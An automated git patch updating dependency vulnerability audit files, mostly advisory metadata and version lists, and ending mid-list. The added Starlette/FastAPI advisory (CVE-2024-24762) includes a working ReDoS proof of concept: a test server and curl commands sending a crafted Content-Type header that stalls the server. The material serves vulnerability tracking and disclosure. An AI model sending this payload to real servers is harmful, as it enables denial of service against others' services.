From 8b59c5e127517d2a73c4d31c18860c3be1307b6a Mon Sep 17 00:00:00 2001 From: "github.actions" Date: Thu, 29 Feb 2024 08:06:21 +0000 Subject: [PATCH] Latest data: Thu Feb 29 08:06:21 UTC 2024 --- audits/esphome-requirements.audit.json | 521 ++++++++++++++++++ audits/openai-whisper-requirements.audit.json | 164 ------ audits/torchvision-requirements.audit.json | 414 -------------- requirements/awscli-local-requirements.txt | 5 +- requirements/bzt-requirements.txt | 6 + requirements/codelimit-requirements.txt | 4 + requirements/conda-lock-requirements.txt | 21 +- requirements/cycode-requirements.txt | 2 +- requirements/dotbot-requirements.txt | 1 + requirements/esphome-requirements.txt | 26 + requirements/fabric-requirements.txt | 1 + requirements/jc-requirements.txt | 1 + requirements/jello-requirements.txt | 1 + requirements/ocrmypdf-requirements.txt | 9 +- requirements/openai-whisper-requirements.txt | 22 +- requirements/pytorch-requirements.txt | 10 + requirements/torchvision-requirements.txt | 6 +- 17 files changed, 610 insertions(+), 604 deletions(-) delete mode 100644 audits/openai-whisper-requirements.audit.json delete mode 100644 audits/torchvision-requirements.audit.json create mode 100644 requirements/dotbot-requirements.txt create mode 100644 requirements/jello-requirements.txt diff --git a/audits/esphome-requirements.audit.json b/audits/esphome-requirements.audit.json index ae73ab98..3da3fba9 100644 --- a/audits/esphome-requirements.audit.json +++ b/audits/esphome-requirements.audit.json @@ -247,5 +247,526 @@ ] } ] + }, + { + "package": { + "name": "starlette", + "version": "0.35.1", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "esphome-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-17T06:26:40Z", + "published": "2024-02-12T17:28:12Z", + "schema_version": "1.6.0", + "id": "GHSA-2jv5-9r88-3w3p", + "aliases": [ + "CVE-2024-24762", + "GHSA-93gm-qmq6-w238", + "GHSA-qf9m-vfgh-m389", + "PYSEC-2024-38" + ], + "summary": "python-multipart vulnerable to Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a simple WSGI application, that just parses the `Content-Type`, and run it with `python main.py`:\n\n```Python\n# main.py\nfrom wsgiref.simple_server import make_server\nfrom wsgiref.validate import validator\n\nfrom multipart.multipart import parse_options_header\n\n\ndef simple_app(environ, start_response):\n _, _ = parse_options_header(environ[\"CONTENT_TYPE\"])\n\n start_response(\"200 OK\", [(\"Content-type\", \"text/plain\")])\n return [b\"Ok\"]\n\n\nhttpd = make_server(\"\", 8123, validator(simple_app))\nprint(\"Serving on port 8123...\")\nhttpd.serve_forever()\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8123/'\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "python-multipart", + "purl": "pkg:pypi/python-multipart" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.7" + } + ] + } + ], + "versions": [ + "0.0.1", + "0.0.2", + "0.0.3", + "0.0.4", + "0.0.5", + "0.0.6" + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.0.6", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-2jv5-9r88-3w3p/GHSA-2jv5-9r88-3w3p.json" + } + }, + { + "package": { + "ecosystem": "PyPI", + "name": "fastapi", + "purl": "pkg:pypi/fastapi" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.109.1" + } + ] + } + ], + "versions": [ + "0.1.0", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.18", + "0.1.19", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.10.0", + "0.10.1", + "0.10.2", + "0.100.0", + "0.100.0b1", + "0.100.0b2", + "0.100.0b3", + "0.100.1", + "0.101.0", + "0.101.1", + "0.102.0", + "0.103.0", + "0.103.1", + "0.103.2", + "0.104.0", + "0.104.1", + "0.105.0", + "0.106.0", + "0.107.0", + "0.108.0", + "0.109.0", + "0.11.0", + "0.12.0", + "0.12.1", + "0.13.0", + "0.14.0", + "0.15.0", + "0.16.0", + "0.17.0", + "0.18.0", + "0.19.0", + "0.2.0", + "0.2.1", + "0.20.0", + "0.20.1", + "0.21.0", + "0.22.0", + "0.23.0", + "0.24.0", + "0.25.0", + "0.26.0", + "0.27.0", + "0.27.1", + "0.27.2", + "0.28.0", + "0.29.0", + "0.29.1", + "0.3.0", + "0.30.0", + "0.30.1", + "0.31.0", + "0.32.0", + "0.33.0", + "0.34.0", + "0.35.0", + "0.36.0", + "0.37.0", + "0.38.0", + "0.38.1", + "0.39.0", + "0.4.0", + "0.40.0", + "0.41.0", + "0.42.0", + "0.43.0", + "0.44.0", + "0.44.1", + "0.45.0", + "0.46.0", + "0.47.0", + "0.47.1", + "0.48.0", + "0.49.0", + "0.49.1", + "0.49.2", + "0.5.0", + "0.5.1", + "0.50.0", + "0.51.0", + "0.52.0", + "0.53.0", + "0.53.1", + "0.53.2", + "0.54.0", + "0.54.1", + "0.54.2", + "0.55.0", + "0.55.1", + "0.56.0", + "0.56.1", + "0.57.0", + "0.58.0", + "0.58.1", + "0.59.0", + "0.6.0", + "0.6.1", + "0.6.2", + "0.6.3", + "0.6.4", + "0.60.0", + "0.60.1", + "0.60.2", + "0.61.0", + "0.61.1", + "0.61.2", + "0.62.0", + "0.63.0", + "0.64.0", + "0.65.0", + "0.65.1", + "0.65.2", + "0.65.3", + "0.66.0", + "0.66.1", + "0.67.0", + "0.68.0", + "0.68.1", + "0.68.2", + "0.69.0", + "0.7.0", + "0.7.1", + "0.70.0", + "0.70.1", + "0.71.0", + "0.72.0", + "0.73.0", + "0.74.0", + "0.74.1", + "0.75.0", + "0.75.1", + "0.75.2", + "0.76.0", + "0.77.0", + "0.77.1", + "0.78.0", + "0.79.0", + "0.79.1", + "0.8.0", + "0.80.0", + "0.81.0", + "0.82.0", + "0.83.0", + "0.84.0", + "0.85.0", + "0.85.1", + "0.85.2", + "0.86.0", + "0.87.0", + "0.88.0", + "0.89.0", + "0.89.1", + "0.9.0", + "0.9.1", + "0.90.0", + "0.90.1", + "0.91.0", + "0.92.0", + "0.93.0", + "0.94.0", + "0.94.1", + "0.95.0", + "0.95.1", + "0.95.2", + "0.96.0", + "0.96.1", + "0.97.0", + "0.98.0", + "0.99.0", + "0.99.1" + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.109.0", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-2jv5-9r88-3w3p/GHSA-2jv5-9r88-3w3p.json" + } + }, + { + "package": { + "ecosystem": "PyPI", + "name": "starlette", + "purl": "pkg:pypi/starlette" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.36.2" + } + ] + } + ], + "versions": [ + "0.1.0", + "0.1.1", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.10.0", + "0.10.1", + "0.10.2", + "0.10.3", + "0.10.4", + "0.10.5", + "0.10.6", + "0.10.7", + "0.11.0", + "0.11.1", + "0.11.2", + "0.11.3", + "0.11.4", + "0.12.0", + "0.12.0b1", + "0.12.0b2", + "0.12.0b3", + "0.12.1", + "0.12.10", + "0.12.11", + "0.12.12", + "0.12.13", + "0.12.2", + "0.12.3", + "0.12.4", + "0.12.5", + "0.12.6", + "0.12.7", + "0.12.8", + "0.12.9", + "0.13.0", + "0.13.1", + "0.13.2", + "0.13.3", + "0.13.4", + "0.13.5", + "0.13.6", + "0.13.7", + "0.13.8", + "0.14.0", + "0.14.1", + "0.14.2", + "0.15.0", + "0.16.0", + "0.17.0", + "0.17.1", + "0.18.0", + "0.19.0", + "0.19.1", + "0.2.0", + "0.2.1", + "0.2.2", + "0.2.3", + "0.20.0", + "0.20.1", + "0.20.2", + "0.20.3", + "0.20.4", + "0.21.0", + "0.22.0", + "0.23.0", + "0.23.1", + "0.24.0", + "0.25.0", + "0.26.0", + "0.26.0.post1", + "0.26.1", + "0.27.0", + "0.28.0", + "0.29.0", + "0.3.0", + "0.3.1", + "0.3.2", + "0.3.3", + "0.3.4", + "0.3.5", + "0.3.6", + "0.3.7", + "0.30.0", + "0.31.0", + "0.31.1", + "0.32.0", + "0.32.0.post1", + "0.33.0", + "0.34.0", + "0.35.0", + "0.35.1", + "0.36.0", + "0.36.1", + "0.4.0", + "0.4.1", + "0.4.2", + "0.5.0", + "0.5.1", + "0.5.2", + "0.5.3", + "0.5.4", + "0.5.5", + "0.6.0", + "0.6.1", + "0.6.2", + "0.6.3", + "0.7.0", + "0.7.1", + "0.7.2", + "0.7.3", + "0.7.4", + "0.8.0", + "0.8.1", + "0.8.2", + "0.8.3", + "0.8.4", + "0.8.5", + "0.8.6", + "0.8.7", + "0.8.8", + "0.9.0", + "0.9.1", + "0.9.10", + "0.9.11", + "0.9.2", + "0.9.3", + "0.9.4", + "0.9.5", + "0.9.6", + "0.9.7", + "0.9.8", + "0.9.9" + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.36.1", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-2jv5-9r88-3w3p/GHSA-2jv5-9r88-3w3p.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p" + }, + { + "type": "WEB", + "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238" + }, + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24762" + }, + { + "type": "WEB", + "url": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4" + }, + { + "type": "WEB", + "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5" + }, + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Kludex/python-multipart" + }, + { + "type": "WEB", + "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/fastapi/PYSEC-2024-38.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-12T17:28:12Z", + "nvd_published_at": null, + "severity": "HIGH" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-2jv5-9r88-3w3p" + ], + "aliases": [ + "CVE-2024-24762", + "GHSA-2jv5-9r88-3w3p", + "GHSA-93gm-qmq6-w238", + "GHSA-qf9m-vfgh-m389", + "PYSEC-2024-38" + ] + } + ] } ] \ No newline at end of file diff --git a/audits/openai-whisper-requirements.audit.json b/audits/openai-whisper-requirements.audit.json deleted file mode 100644 index 1aa313cf..00000000 --- a/audits/openai-whisper-requirements.audit.json +++ /dev/null @@ -1,164 +0,0 @@ -[ - { - "package": { - "name": "jinja2", - "version": "3.1.2", - "ecosystem": "PyPI" - }, - "dependency_groups": [ - "openai-whisper-requirements" - ], - "vulnerabilities": [ - { - "modified": "2024-02-16T08:18:43Z", - "published": "2024-01-11T15:20:48Z", - "schema_version": "1.6.0", - "id": "GHSA-h5c8-rqwp-cp95", - "aliases": [ - "CVE-2024-22195" - ], - "summary": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter", - "details": "The `xmlattr` filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the `xmlattr` filter, and an application doing so should already be verifying what keys are provided regardless of this fix.", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "jinja2", - "purl": "pkg:pypi/jinja2" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "3.1.3" - } - ] - } - ], - "versions": [ - "2.0", - "2.0rc1", - "2.1", - "2.1.1", - "2.10", - "2.10.1", - "2.10.2", - "2.10.3", - "2.11.0", - "2.11.1", - "2.11.2", - "2.11.3", - "2.2", - "2.2.1", - "2.3", - "2.3.1", - "2.4", - "2.4.1", - "2.5", - "2.5.1", - "2.5.2", - "2.5.3", - "2.5.4", - "2.5.5", - "2.6", - "2.7", - "2.7.1", - "2.7.2", - "2.7.3", - "2.8", - "2.8.1", - "2.9", - "2.9.1", - "2.9.2", - "2.9.3", - "2.9.4", - "2.9.5", - "2.9.6", - "3.0.0", - "3.0.0a1", - "3.0.0rc1", - "3.0.0rc2", - "3.0.1", - "3.0.2", - "3.0.3", - "3.1.0", - "3.1.1", - "3.1.2" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-h5c8-rqwp-cp95/GHSA-h5c8-rqwp-cp95.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" - } - ], - "references": [ - { - "type": "WEB", - "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95" - }, - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195" - }, - { - "type": "WEB", - "url": "https://github.com/pallets/jinja/commit/716795349a41d4983a9a4771f7d883c96ea17be7" - }, - { - "type": "PACKAGE", - "url": "https://github.com/pallets/jinja" - }, - { - "type": "WEB", - "url": "https://github.com/pallets/jinja/releases/tag/3.1.3" - }, - { - "type": "WEB", - "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "github_reviewed": true, - "github_reviewed_at": "2024-01-11T15:20:48Z", - "nvd_published_at": "2024-01-11T03:15:11Z", - "severity": "MODERATE" - } - } - ], - "groups": [ - { - "ids": [ - "GHSA-h5c8-rqwp-cp95" - ], - "aliases": [ - "CVE-2024-22195", - "GHSA-h5c8-rqwp-cp95" - ] - } - ] - } -] \ No newline at end of file diff --git a/audits/torchvision-requirements.audit.json b/audits/torchvision-requirements.audit.json deleted file mode 100644 index a9507c30..00000000 --- a/audits/torchvision-requirements.audit.json +++ /dev/null @@ -1,414 +0,0 @@ -[ - { - "package": { - "name": "urllib3", - "version": "2.0.6", - "ecosystem": "PyPI" - }, - "dependency_groups": [ - "torchvision-requirements" - ], - "vulnerabilities": [ - { - "modified": "2024-02-21T05:25:29Z", - "published": "2023-10-17T20:15:25Z", - "schema_version": "1.6.0", - "id": "GHSA-g4mx-q9vg-27p4", - "aliases": [ - "CVE-2023-45803", - "PYSEC-2023-212" - ], - "summary": "urllib3's request body not stripped after redirect from 303 status changes request method to GET", - "details": "urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 303 \"See Other\" after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although the behavior of removing the request body is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers.\n\nFrom [RFC 9110 Section 9.3.1](https://www.rfc-editor.org/rfc/rfc9110.html#name-get):\n\n> A client SHOULD NOT generate content in a GET request unless it is made directly to an origin server that has previously indicated, in or out of band, that such a request has a purpose and will be adequately supported.\n\n## Affected usages\n\nBecause the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable.\n\nBoth of the following conditions must be true to be affected by this vulnerability:\n\n* If you're using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON)\n* The origin service is compromised and starts redirecting using 303 to a malicious peer or the redirected-to service becomes compromised.\n\n## Remediation\n\nYou can remediate this vulnerability with any of the following steps:\n\n* Upgrade to a patched version of urllib3 (v1.26.18 or v2.0.7)\n* Disable redirects for services that you aren't expecting to respond with redirects with `redirects=False`.\n* Disable automatic redirects with `redirects=False` and handle 303 redirects manually by stripping the HTTP request body.\n", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "urllib3", - "purl": "pkg:pypi/urllib3" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "2.0.0" - }, - { - "fixed": "2.0.7" - } - ] - } - ], - "versions": [ - "2.0.0", - "2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - "2.0.6" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g4mx-q9vg-27p4/GHSA-g4mx-q9vg-27p4.json" - } - }, - { - "package": { - "ecosystem": "PyPI", - "name": "urllib3", - "purl": "pkg:pypi/urllib3" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "1.26.18" - } - ] - } - ], - "versions": [ - "0.2", - "0.3", - "0.3.1", - "0.4.0", - "0.4.1", - "1.0", - "1.0.1", - "1.0.2", - "1.1", - "1.10", - "1.10.1", - "1.10.2", - "1.10.3", - "1.10.4", - "1.11", - "1.12", - "1.13", - "1.13.1", - "1.14", - "1.15", - "1.15.1", - "1.16", - "1.17", - "1.18", - "1.18.1", - "1.19", - "1.19.1", - "1.2", - "1.2.1", - "1.2.2", - "1.20", - "1.21", - "1.21.1", - "1.22", - "1.23", - "1.24", - "1.24.1", - "1.24.2", - "1.24.3", - "1.25", - "1.25.1", - "1.25.10", - "1.25.11", - "1.25.2", - "1.25.3", - "1.25.4", - "1.25.5", - "1.25.6", - "1.25.7", - "1.25.8", - "1.25.9", - "1.26.0", - "1.26.1", - "1.26.10", - "1.26.11", - "1.26.12", - "1.26.13", - "1.26.14", - "1.26.15", - "1.26.16", - "1.26.17", - "1.26.2", - "1.26.3", - "1.26.4", - "1.26.5", - "1.26.6", - "1.26.7", - "1.26.8", - "1.26.9", - "1.3", - "1.4", - "1.5", - "1.6", - "1.7", - "1.7.1", - "1.8", - "1.8.2", - "1.8.3", - "1.9", - "1.9.1" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g4mx-q9vg-27p4/GHSA-g4mx-q9vg-27p4.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" - } - ], - "references": [ - { - "type": "WEB", - "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4" - }, - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803" - }, - { - "type": "WEB", - "url": "https://github.com/urllib3/urllib3/commit/4e50fbc5db74e32cabd5ccc1ab81fc103adfe0b3" - }, - { - "type": "WEB", - "url": "https://github.com/urllib3/urllib3/commit/4e98d57809dacab1cbe625fddeec1a290c478ea9" - }, - { - "type": "WEB", - "url": "https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36" - }, - { - "type": "WEB", - "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml" - }, - { - "type": "PACKAGE", - "url": "https://github.com/urllib3/urllib3" - }, - { - "type": "WEB", - "url": "https://github.com/urllib3/urllib3/releases/tag/1.26.18" - }, - { - "type": "WEB", - "url": "https://github.com/urllib3/urllib3/releases/tag/2.0.7" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX" - }, - { - "type": "WEB", - "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "github_reviewed": true, - "github_reviewed_at": "2023-10-17T20:15:25Z", - "nvd_published_at": "2023-10-17T20:15:10Z", - "severity": "MODERATE" - } - }, - { - "modified": "2023-11-08T04:13:39Z", - "published": "2023-10-17T20:15:00Z", - "schema_version": "1.6.0", - "id": "PYSEC-2023-212", - "aliases": [ - "CVE-2023-45803", - "GHSA-g4mx-q9vg-27p4" - ], - "details": "urllib3 is a user-friendly HTTP client library for Python. urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 301, 302, or 303 after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although this behavior is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: 1. Using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) and 2. The origin service is compromised and starts redirecting using 301, 302, or 303 to a malicious peer or the redirected-to service becomes compromised. This issue has been addressed in versions 1.26.18 and 2.0.7 and users are advised to update to resolve this issue. Users unable to update should disable redirects for services that aren't expecting to respond with redirects with `redirects=False` and disable automatic redirects with `redirects=False` and handle 301, 302, and 303 redirects manually by stripping the HTTP request body.\n", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "urllib3", - "purl": "pkg:pypi/urllib3" - }, - "ranges": [ - { - "type": "GIT", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "4e98d57809dacab1cbe625fddeec1a290c478ea9" - } - ], - "repo": "https://github.com/urllib3/urllib3" - }, - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "2.0.0" - }, - { - "fixed": "2.0.7" - }, - { - "introduced": "0" - }, - { - "fixed": "1.26.18" - } - ] - } - ], - "versions": [ - "0.2", - "0.3", - "0.3.1", - "0.4.0", - 